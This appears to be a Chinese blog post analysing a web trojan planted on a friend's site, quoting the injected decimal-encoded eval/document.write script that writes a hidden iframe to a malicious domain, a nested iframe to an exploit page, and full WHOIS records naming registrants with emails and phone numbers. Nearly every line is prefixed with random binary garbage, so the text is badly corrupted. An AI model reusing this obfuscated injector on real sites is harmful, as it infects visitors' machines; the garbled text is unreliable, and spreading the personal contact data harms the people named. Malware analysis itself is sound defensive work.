首发在我的博客里面,
b�ny5e:= d vxZ'�-&;�t http://www.areway.cn/?p=175 V[(fE=cIN~ '�W(�u��.� xq((]5P�y 周末上线鸭子就Q我说他的站给挂了马,当时没太注意就直接打开了连接,截下了网页源码:
G�UR��iW42 ~]-n%J�$�q <script>t=’60,105,102,114,97,109,101,
M G$+�Blw> 32,115,114,99,61,104,116,116,112,58,47,47,
U��
3<
3�T 102,114,101,101,46,117,45,117,117,117,46,99,
RB %�+|@c 110,47,101,114,114,111,114,46,104,116,109,
��t1�w]L�� 32,119,105,100,116,104,61,49,48,48,32,104,
��+;~N; BT 101,105,103,104,116,61,48,62,60,47,105,102,
"�s0,9;�
} 114,97,109,101,62′;
(�v�G*)�a t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script>
46�g��0
e� 'J��OCL0FP <script>t=’60,105,102,114,97,109,101,32,115,
gO8d�2�?Oh 114,99,61,104,116,116,112,58,47,47,102,114,
Bz��f�R8mD 101,101,46,117,45,117,117,117,46,99,110,47,
':(AiD��-} 101,114,114,111,114,46,104,116,109,32,119,
�:GIBB=�D9 105,100,116,104,61,49,48,48,32,104,101,105,
gkd4��)\9� 103,104,116,61,48,62,60,47,105,102,114,97,
�gk�|�>E[. 109,101,62′;t=eval(’String.fromCharCode(’+t+’)');
o�J�4HvrUO document.write(t);</script>
tY;<S}[@7w 0I.KHIB��k <html xmlns=”
%j\&}>P4$� http://www.w3.org/1999/xhtml ui>jJ��(�� “>
K�zrd<h]`) <head>
uP* �kvi:e <!– Published By Newasp.cc 2007-12-7-18:03:23 –>
R�xqNg�un@ <meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
)c4tG�T<� <title>首页 - 爱生活家庭网
YD[HBF)~j �j1�;[�6XG 上面有一段 script的十进制加密字段,里面的大概内容是,把所有的字符放在函数t里面,最后用doucment.write(t)来把字符串写在网页里面。
` �Ta�p0V� 转换字符串后的大概内容是(谁点击后果自付):
tBGL�EeL/. <script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=………
��`��TP�Ic ��U��\P4ts 查询玉米u-uuu.cn的详细信息:
$rXCNe�w( Domain Name: u-uuu.cn
+KbkdY���Z ROID: 20070901s10001s64972306-cn
b,^ �"-r Domain Status: ok
T�O.b-
��; Registrant Organization: 王雷
R$awo/'��^ Registrant Name: 王雷
i�3���eF_� Administrative Email:
czlovexs@126.com _-C/s�p^�� Sponsoring Registrar: 北京万网志成科技有限公司
G*4I�;'��6 Name Server:ns.yovole.com
c�
K�\�
� Name Server:ns1.yovole.com
x�eFx�!$�3 Registration Date: 2007-09-01 17:54
e�e?
d�?:L Expiration Date: 2008-09-01 17:54
>8"(go+02
最后PING了一下地址 都没有什么….
FygN��WI�' >p�p/4�Ia! 上虚拟机里面继续分析,IE里面打开上面的连接…查看源代码…..直接又有嵌套.
ycBgr,Ynu< <iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
�3JGrJ��!x <script language=”javascript” src=”
D�\�_nqx9O http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script �3�WP\��MM >
RFRX�OyGz$ 这个玉米应该有可能是木马作者的:
�G[ U5R?/� foafau.info的详细信息:
$l*���?Ce: Access to INFO WHOIS information is provided to assist persons in
)8�C`�EPe determining the contents of a domain name registration record in the
m538p.(LIR Afilias registry database. The data in this record is provided by
��$Y7VA��� Afilias Limited for informational purposes only, and Afilias does not
:%h�1�Q>F guarantee its accuracy. This service is intended only for query-based
9�jjeZ�c' access. You agree that you will use this data only for lawful purposes
w(��V�%EEk and that, under no circumstances will you use this data to: (a) allow,
$_�F�_%m"\ enable, or otherwise support the transmission by e-mail, telephone, or
�j;`pAN�(' facsimile of mass unsolicited, commercial advertising or solicitations
r�ci,�&>L" to entities other than the data recipient’s own existing customers; or
av!;��k2"� (b) enable high volume, automated, electronic processes that send
C4(xtSJSd! queries or data to the systems of Registry Operator, a Registrar, or
q\<l�"b� z Afilias except as reasonably necessary to register domain names or
%nk�P" Z#� modify existing registrations. All rights reserved. Afilias reserves
��;D~#|C�B the right to modify these terms at any time. By submitting this query,
u9 &$`�N_G you agree to abide by this policy.
QQW�}.�>�N Domain ID:D22418703-LRMS
:��6(�\��: Domain Name:FOAFAU.INFO
)G)6D"5,+G Created On:20-Nov-2007 16:05:42 UTC
�Ry�K~"CWT Last Updated On:20-Nov-2007 16:05:44 UTC
uaO�.7QSwN Expiration Date:20-Nov-2008 16:05:42 UTC
�w8�X5kk
� Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
y-�26\eY^P Status:CLIENT DELETE PROHIBITED
l+6��c|([� Status:CLIENT RENEW PROHIBITED
Z�|C,HF+m. Status:CLIENT TRANSFER PROHIBITED
)�>1}I_1j) Status:CLIENT UPDATE PROHIBITED
+U��D�t2�� Status:TRANSFER PROHIBITED
{`D]�%e�RO Registrant ID:GODA-040110615
~Y`ys[Z m� Registrant Name:liu hong
�D`@a*YI�q Registrant Organization:
wKpB�H�}�� Registrant Street1:beijing
Q$�ew.�h�� Registrant Street2:
N~fl�ao�^ Registrant Street3:
�Xr
K�2�9a Registrant City:beijing
^<�!R�%"o- Registrant State/Province:
�U�Lt5Z�i Registrant Postal Code:100000
zH~�P-MqC� Registrant Country:CN
MJi�V�FfYW Registrant Phone:+86.860108888777
ntH�`\ )xi Registrant Phone Ext.:
F2
B(PGa7 Registrant FAX:
Cd�z?+hb�� Registrant FAX Ext.:
0 ��8�)f�� Registrant Email:bbbshiji@163.com
\H .Cmm^I� Admin ID:GODA-240110615
[@9S-$�Xa� Admin Name:liu hong
_{`�Z��?lt Admin Organization:
#;��!@�Pf� Admin Street1:beijing
�32K�& IfV Admin Street2:
F�X�o�.f<U Admin Street3:
�z@VL?�A(3 Admin City:beijing
x[l�Iib�1s Admin State/Province:
_6fy�'%J=U Admin Postal Code:100000
^�5�s7ml�s Admin Country:CN
\C$e+qb~�{ Admin Phone:+86.860108888777
�)f$4:�Pq� Admin Phone Ext.:
L6CI9�C;-b Admin FAX:
bIGcs��zWr Admin FAX Ext.:
�%j^�QK�>% Admin Email:bbbshiji@163.com
�(�xW+* % Billing ID:GODA-340110615
�=u�}~\ 'd Billing Name:liu hong
+A8q.-N
G Billing Organization:
.T7��CMkYt Billing Street1:beijing
zd%��f5L(' Billing Street2:
�xy:�Mb =r Billing Street3:
FQ�0&{ulb Billing City:beijing
�QD0x�^v8� Billing State/Province:
�KWo P�s%G Billing Postal Code:100000
ZY,�$oFdsi Billing Country:CN
'l(s)Oa{M: Billing Phone:+86.860108888777
zI[<uvxzW` Billing Phone Ext.:
/lR*a�b��� Billing FAX:
8a*�&,���W Billing FAX Ext.:
P@@MQ[u?!. Billing Email:bbbshiji@163.com
*j�h�gC�m� Tech ID:GODA-140110615
'nPI
zK<�v Tech Name:liu hong
=-Hhm($n Tech Organization:
.I�~:j�`K6 Tech Street1:beijing
WA2N��jxYz Tech Street2:
xY]q�[a?cy Tech Street3:
9�^DAlY,x. Tech City:beijing
w>*J�gc@A* Tech State/Province:
YT?Lt!cl=� Tech Postal Code:100000
�g�^
?G)>� Tech Country:CN
atpHv**D<i Tech Phone:+86.860108888777
�T�/���ECW Tech Phone Ext.:
�3�:�xx:Jt Tech FAX:
_LZ(HT�X~� Tech FAX Ext.:
gd
* b�0�( Tech Email:bbbshiji@163.com
l��ZRO�"[< Name Server:NS27.DOMAINCONTROL.COM
3U�^Vz�9LW Name Server:NS28.DOMAINCONTROL.COM
�j~Pw�t�9G Name Server:
[<,7�LG<�� Name Server:
�DX!�dU'tj Name Server:
Ra5��3M!>] Name Server:
� �d;��>�G Name Server:
47(_5�PFb# Name Server:
��od��ca�? Name Server:
�jR}E�BaI} Name Server:
Ps�f'^42(v Name Server:
B��~]6��[Z Name Server:
oH1�7!$Fly Name Server:
2�p�9^ ��= Y7���+c/co 接着下载每个文件里面的代码:
.f0qgm�IyL 一步一步看..
�hpXW t�Q� 
|_E�D*ATR= 
�
;@k=9o]A 
�%Qz<Lk">. 
�;7�6�+J�) 
^��U,iDK_ 都是十进制的代码,也懒得再分析了,有这个爱好的大家可以继续试试
